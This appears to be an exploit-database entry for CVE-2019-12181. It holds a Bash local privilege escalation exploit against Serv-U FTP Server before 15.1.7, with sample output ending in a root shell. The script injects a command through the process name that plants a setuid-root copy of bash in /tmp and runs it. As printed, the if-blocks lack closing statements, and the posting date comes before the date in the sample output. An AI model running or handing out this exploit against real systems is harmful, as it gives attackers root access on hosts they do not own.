Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)

2019-01-13 12:17:48

# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
# -
# ---
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
# [*] Launching Serv-U ...
# sh: 1: : Permission denied
# [+] Success:
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
# [*] Launching root shell: /tmp/sh
# sh-4.4# id
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
# ---
# <[email protected]>

if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1

echo "[*] Launching Serv-U ..."

/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'

if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1

echo '[+] Success:'
/bin/ls -la /tmp/sh

echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p


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